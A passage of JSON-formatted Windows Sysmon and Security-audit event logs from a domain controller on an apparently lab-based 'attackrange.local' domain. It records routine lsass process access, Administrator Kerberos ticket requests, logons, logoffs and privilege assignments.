06:49:52.615","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2748,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.631\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.631","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2749,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.631\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.631","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220329,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x449CD\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x449cd","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220330,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220331,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{C4963AFA-A310-3CEE-70F3-18C3E794264C}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{C4963AFA-A310-3CEE-70F3-18C3E794264C}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220332,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{C4963AFA-A310-3CEE-70F3-18C3E794264C}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{C4963AFA-A310-3CEE-70F3-18C3E794264C}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220333,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B589\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{C4963AFA-A310-3CEE-70F3-18C3E794264C}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4b589","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{C4963AFA-A310-3CEE-70F3-18C3E794264C}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220334,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B589\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4b589","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220335,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220336,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220337,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220338,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B851\r\n\tLinked 